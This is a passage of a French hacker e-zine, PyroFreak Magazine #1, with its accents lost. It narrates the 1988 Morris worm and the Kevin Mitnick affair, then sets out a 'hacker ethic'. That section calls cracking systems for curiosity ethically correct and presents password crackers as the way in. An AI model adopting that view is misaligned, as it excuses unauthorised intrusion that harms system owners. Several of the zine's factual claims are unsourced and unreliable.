infects, le 2 novembre 1988 vers dix-huit heures. Le lendemain, des 
centaines de Vax, des stations Sun ainsi que d'autre machines fonctionnant 
sous Unix taient elles aussi touches. Les oprateurs relevaient des temps 
de rponse fortement dgrads, leurs machines tant surcharges de travail 
par l'excution simultane d'une multitude de tches qui renaissaient 
spontanment en dpit des efforts visant  les liminer. Pire, une machine 
arrte puis redmarre se trouvait instantanment contamine. En tout cas, 
l'importance du fuck up provoque par Robert T. Morris en ce " jeudi noir " a 
dmontr que, contrairement  ce que l'ont pense, les minis et moyens 
systmes fonctionnant sous Unix ne sont pas plus  l'abri des "pidmies 
informatiques " que les micro-ordinateurs.  


Internet, le rseau attaqu, relie entre elles toutes les universits 
amricaines et des milliers de sites. Son premier rle reste l'acheminement 
du courrier lectronique des enseignants, des chercheurs et mme des 
tudiants, ce qui reprsente une population de plusieurs millions d'usagers. 
Le mme rseau autorise le transfert de fichiers et l'ouvertures de sessions 
" console " sur des machines distantes. 
Sitt l'attaque dtecte, les meilleurs chercheurs d'outre-Atlantique se sont
empresss de la combattre. Il leur a fallu deux jours pour dmontrer le 
mcanisme du ver. Un programme compos d'une centaine de lignes de C coupl  
deux fichiers " objet " (l'un propre aux serveurs Vax et l'autre aux stations 
Sun) constituaient le vecteur d'infection. Aussitt entr dans un 
calculateur, le " Morris worm " tablissait la liste des autres machines 
connectes au mme noeud du rseau et consacrait alors toutes les ressources 
de la machine nouvellement conquise  la contamination des autres postes. 

Un des processus de l'attaque consistait en une routine de craquage des " 
mots de passe " (Comment font-ils?), remarquable pour sa vitesse. C'est  
cette tche que le ver dpensait la plus grande partie du temps de travail 
des machines colonises. 

     
Pour se dfendre, le ver maintenait son propre code sous forme crypt 
(cryptage). Et pour dcourager les tentatives visant  le dsassembler, il 
changeait rgulirement de numro de processus se rendant plus difficile  
dceler. Malgr tout, l'infection restait somme toute bnigne puisqu'elle ne 
dtruisait aucune donne.  Pour mmoire, notons que le pre de l'tudiant 
factieux compte parmi les plus grands experts amricains de la scurit 
informatique. Nul doute que R.T Morris suive le mme chemin.  Il est  noter 
que les responsables de la scurit ont su tirer les leons de la 
msaventure. Dix ans aprs, une infection de cette envergure ne semble plus 
possible. 



Le roi des hackers ( d'aprs la revue espagnole Web ) 


Kevin Mitnick est le hors-la-loi le plus clbre d'aujourd'hui.  Surnomm par 
la presse le roi des hackers, il a t arrt par Tsutomu Shimomura et 
l'histoire nous est raconte par un journaliste tmoin de l'aventure John 
Markoff sur http://www.takedown.com/.  Deux pirates informatiques ont menac 
de dtruire des millions d'ordinateurs si les autorits ne relchaient pas 
Kevin Mitnick, incarcr il y a deux ans pour tre entr dans diffrents 
ordinateurs. Il a vol les codes secrets de quelques milliers de cartes 
tlphoniques et accd virtuellement  une base de missiles, entre autres. 
Les deux pirates, qui se sont appels eux-mmes " Pants/Hagis ", ont accd 
au serveur du populaire moteur de recherche Yahoo ! Et y ont laiss un 
message menaant : "tous ceux qui ont utilis le mois dernier le moteur de 
recherches Yahoo ! ont attrap une bombe logique qui s'activera le jour de 
Nol 1998, semant le chaos dans tous les rseaux informatiques du monde ". Et 
ils ont ajout qu'ils ne donneraient l'antidote uniquement si Mitnick, 
condamn ni plus ni moins qu'  35 ans de prison, tait libr. Le 
porte-parole de Yahoo! Diane Hunt, a reconnu que des hackers taient rentrs 
dans la page de l'entreprise mais sans rien dtruire. Elle a ajout que " il 
est impossible que les ordinateurs s'tant connects au serveur soient 
infects ". C'est en effet ce qui s'est pass, et la bombe imagine par les 
pirates n'a pas explos. Mais le fait de sensibiliser l'opinion au cas 
Mitnick avait t russi.   Qui est K. Mitnick ? Comme hacker sa carrire a 
commenc  16 ans quand, obsd par les rseaux informatiques, il a forc la 
barrire de scurit du systme administratif de son collge. Pour Kevin, le 
passetemps de ses dix dernires annes fut d'explorer et exploiter les 
compteurs d'autrui et les systmes tlphoniques. Sa profession ? " cracker 
", et sans aucun doute trs bon. Selon le Dpartement de Justice des Etats 
Unis, ce " terroriste lectronique " connu sous le nom de " El Condor ", a 
t capable de crer des numros de tlphones impossibles  facturer, de 
s'approprier 20000 cartes de crdit d'habitants de la Californie, d'chapper 
au FBI pendant plus de deux ans avec comme outil seulement un tlphone 
cellulaire et un ordinateur portable. 


Mitnick avait dj t arrt en 1988 pour avoir envahi le systme de Digital 
Equipment. Il fut dclar coupable du chef d'accusation suivant "fraude 
utilisant des ordinateurs", et pour possession illgale de codes d'accs de 
longue distance. Il fut alors incarcr puis priv de tlphone par la Cour 
car, selon eux, il tait capable d'accder et de prendre le contrle
d'un ordinateur avec un simple tlphone!


Credit: e-zines Anglais et Espagnol dj publier.

thic d'apres ce que moi ([G]r4FX) pense.



L'thic du Hacker

1-  Un Hacker crois en la liberter de l'information et que l'change de cette
information en toute libert est essentielle au bon fonctionnement d'une
socit.  Cet dans l'thic du Hacker de faire partager son savoir en crivant
des "Software" gratuit pour que cette information soit lu par le plus de 
personne possible.  En plus, un Hacker doit faciliter l'acces  cette 
information par les "soft" qu'il a crit et de faciliter l'acces de partout
au ressources informatiser.

2-  Un Hacker croit aussi que le "cracking" d'un systeme informatik pour 
le plaisir et pour la curiosit est thiquement correct, tant et aussi 
longtemsp longtemps que le "cracker" ne commets aucun vol vandalisme, ou
un "breach" de confidentialit.  Ces deux principes thics normatif sont 
accept par par plusieurs Hackers en grande partie mais ce ne sont pas
tous.  La plupard des Hckers adrent a l'thic vu en (1).  

Le sense numro 2 est tres contrevers: il y a des hackers qui disent 
que le "cracking" n'est pas "politiquement correct" mais tant qu'a moi pour
hacker un system il faut que trouve le "login" et le "password" donc pour 
ce faire du doit utiliser un "password cracker", donc ... 


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
|      N'oubliez pas, vous etes le seul responsable de vos actes!!!!
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __

Conclusion

J'espere que vous avez aim le #1 de pyrofreakmag , si ce n'est pas le cas,
lisez pas le #2 parce que il va etre semblable. Si vous dsirer faire publier
votre article dans le #2, envoyez le a pyrofreakmag@hotmail.com , ou via IRC
(#phreak.fr UNDERNET)-Site web:http://pyrophreak.cjb.net  . Dans le prochain
numero, on va peut-etre faire une FAQ, cela va dpendre si on a beaucoup de
question par e-mail. Le #2 est fixer pour environ le 1er mars. 
Pour commentaire ou suggestion : pyrofreakmag@hotmail.com 
J'aimerais remercier tout le monde qui on participer au zine, en particulier
__2 pour le beau logo!!! Thank

@@@@@@@@@@@@@@@@@@@@Pyrofreakmag touts droits rservs@@@@@@@@@@@@@@@@@@@@@@


